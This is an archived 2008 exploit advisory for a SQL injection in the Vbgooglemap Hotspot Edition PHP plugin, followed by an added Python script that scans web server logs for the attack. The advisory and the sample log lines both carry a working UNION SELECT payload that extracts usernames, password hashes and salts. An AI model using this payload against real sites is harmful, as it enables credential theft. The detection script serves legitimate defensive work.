Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection

EDB-ID: 6593
Author: elusiven
Type: webapps
Platform: PHP
Date: 2008-09-27


#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.

#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################

# milw0rm.com [2008-09-27]
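
Added example (not part of the original advisory or of the product's code): a check a defender can run over web server access logs to find requests to the two scripts above whose mapid value is not a plain integer. It assumes legitimate mapid values are non-negative integers and that logs use the common/combined format; the sample log lines, addresses and the /forum/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory; both take do=showdetails&mapid=...
SCRIPTS = ("vbgooglemaphse.php", "mapa.php")
# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate mapid is a plain non-negative integer.
VALID_MAPID = re.compile(r"\d+")
SQL_TOKENS = re.compile(r"\b(union|select|from)\b|--|/\*", re.I)


def check_line(line):
    """Return None for benign lines, else a dict describing the finding."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    # parse_qs decodes %XX and turns '+' into spaces, so encoded variants
    # are normalised before matching.
    params = parse_qs(url.query, keep_blank_values=True)
    if "showdetails" not in params.get("do", []):
        return None
    bad = [v for v in params.get("mapid", []) if not VALID_MAPID.fullmatch(v)]
    if not bad:
        return None
    return {"script": script, "mapid": bad[0], "sql_tokens": bool(SQL_TOKENS.search(bad[0]))}


# Constructed sample log lines (documentation addresses, hypothetical path).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2008:10:00:01 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Sep/2008:10:02:17 +0000] "GET /forum/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- HTTP/1.1" 200 2048',
    '192.0.2.44 - - [27/Sep/2008:10:02:40 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=-1%20union%20select%200 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [27/Sep/2008:10:03:00 +0000] "GET /forum/index.php?mapid=abc HTTP/1.1" 200 900',
]


def scan(lines):
    return [f for f in map(check_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the scripts before mapid reaches the query, is the fix; the log check only shows whether such requests were already made.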